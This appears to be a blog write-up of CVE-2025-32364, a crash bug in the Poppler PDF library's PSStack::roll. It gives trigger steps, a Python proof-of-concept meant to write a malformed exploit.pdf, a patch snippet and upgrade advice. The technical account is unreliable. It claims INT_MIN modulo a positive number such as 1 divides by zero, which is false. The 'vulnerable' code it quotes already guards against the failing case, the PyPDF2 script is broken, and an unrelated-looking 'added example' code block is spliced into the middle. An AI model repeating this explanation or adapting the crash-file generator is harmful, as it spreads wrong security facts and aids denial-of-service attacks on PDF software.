CVE-2025-32364 - Exploiting the Poppler Floating-Point Exception in PSStack::roll (Pre-25.04.0)

Earlier this year, researchers discovered a new vulnerability in Poppler, the widely used PDF rendering library. Tracked as CVE-2025-32364, this bug results from a floating-point exception in the PSStack::roll function. Applications that rely on Poppler for PDF processing can crash when exposed to specially crafted, malformed PDFs. In this article, we’ll break down what’s happening, show you how the issue is triggered, and explore its security impact.

What’s Poppler?

Poppler is a popular open-source PDF rendering library used in many Linux applications—including Evince, Okular, and Xpdf. Many scripts and tools rely on Poppler for PDF-to-text and PDF-to-image conversion.

- Impact: Crash (Denial of Service)

- Trigger: Handling malformed PDF input that causes an integer divide-by-zero, typically with inputs associated with INT_MIN.

When Poppler parses certain illegitimate PDF objects, the rollover arithmetic inside PSStack::roll can trigger a floating-point exception (typically divide-by-zero), crashing the application.

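Here’s a simplified look at the vulnerable function, based on the Poppler source code before the fix:

```cpp
void PSStack::roll(int n, int k) {
    // Nothing to rotate for an empty or negative window
    if (n <= 0)
        return;
    // Reduce the roll amount to the window size
    k = k % n;
    if (k < 0)
        k += n;
    // ... perform rotation ...
}
```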

When k is INT_MIN and n is a positive integer, k % n can result in a divide-by-zero exception due to C/C++ modulo behavior with negatives and extreme integers.

Step 1: Create a Malformed PDF

Attackers generate a PDF where the embedded PostScript stack commands (possibly via /PS or /Type3 glyphs) supply extremely negative values—like INT_MIN (usually -2147483648 for 32-bit ints).

Step 2: Poppler Handles PDF

When Poppler processes this PDF (e.g., opening with Evince or running pdftocairo), the malicious value is passed to PSStack::roll.

Step 3: Crash

If the input triggers a modulo calculation with k = INT_MIN and n = 1 (or similar), the function encounters a floating-point exception, causing an immediate crash.

Proof-of-concept Exploit

Below is an abbreviated Python script (using PyPDF2 or similar libraries) showing how one might inject malformed data:

```python
from PyPDF2 import PdfWriter

writer = PdfWriter()
page = writer.add_blank_page(72, 72)
# Fictitious low-level PostScript stream with 'roll' and maliciously low k
page_content = b'''
/foo {
    1 -2147483648 roll
} def
foo
'''
page.merge_page({'/Contents': page_content})
with open("exploit.pdf", "wb") as f:
    writer.write(f)
```

This is a conceptual example; real exploitation would use a crafted PDF with precise PostScript content.

# Fix

The Poppler team patched the bug in version 25.04.0. The fix ensures proper integer checks and avoids dangerous modulo operations with values like INT_MIN.

Example patched logic:

```cpp
// needs <limits> for std::numeric_limits
if (n <= 0 || k == std::numeric_limits<int>::min()) {
    // Avoid crash
    return;
}
```
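One way to normalise the roll amount so that no INT_MIN input can fault, as an added example (not Poppler's code or its actual patch). The names `normalizeRoll` and `safeRoll` are hypothetical, and instead of rejecting INT_MIN as the patched snippet above does, it widens k to 64 bits before taking the remainder.

```cpp
#include <cstddef>
#include <cstdint>
#include <cstdio>
#include <limits>
#include <vector>

// Hypothetical helper: reduce a roll amount k to the range [0, n).
// Returns -1 when n is not a usable window size.
int normalizeRoll(int n, int k) {
    if (n <= 0) {
        return -1; // keeps n == 0 and n == -1 away from '%'
    }
    // In int, -INT_MIN and INT_MIN % -1 are undefined behaviour (the latter
    // traps with SIGFPE on x86). In 64 bits INT_MIN is an ordinary value.
    std::int64_t r = static_cast<std::int64_t>(k) % n;
    if (r < 0) {
        r += n;
    }
    return static_cast<int>(r); // 0 <= r < n, so it fits in int
}

// PostScript-style roll on a stack whose top is the back of the vector:
// the top n entries are rotated k positions towards the top.
// Returns false, leaving the stack untouched, for unusable arguments.
bool safeRoll(std::vector<int> &stack, int n, int k) {
    if (n <= 0 || static_cast<std::size_t>(n) > stack.size()) {
        return false;
    }
    const std::size_t len = static_cast<std::size_t>(n);
    const std::size_t shift = static_cast<std::size_t>(normalizeRoll(n, k));
    const std::size_t base = stack.size() - len;
    const std::vector<int> window(stack.begin() + base, stack.end());
    for (std::size_t i = 0; i < len; ++i) {
        stack[base + (i + shift) % len] = window[i];
    }
    return true;
}

int main() {
    std::vector<int> s = {1, 2, 3, 4, 5}; // constructed sample stack
    safeRoll(s, 3, std::numeric_limits<int>::min());
    for (int v : s) {
        std::printf("%d ", v);
    }
    std::printf("\n");
    return 0;
}
```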

- Affected versions: Poppler < 25.04.0

- Applications affected: Okular, Evince, Xpdf, and any tool or script using Poppler for PDF processing.

Recommendation: Patch and update Poppler immediately. If you cannot update, avoid opening untrusted PDFs or use isolation methods (sandboxing).

Conclusion

CVE-2025-32364 highlights the importance of careful integer and memory handling, especially when parsing complex file formats like PDF. If your system or app uses Poppler, upgrade to v25.04.0+ to stay secure.



Timeline

Published on: 04/05/2025 22:15:18 UTC
Last modified on: 04/07/2025 14:17:50 UTC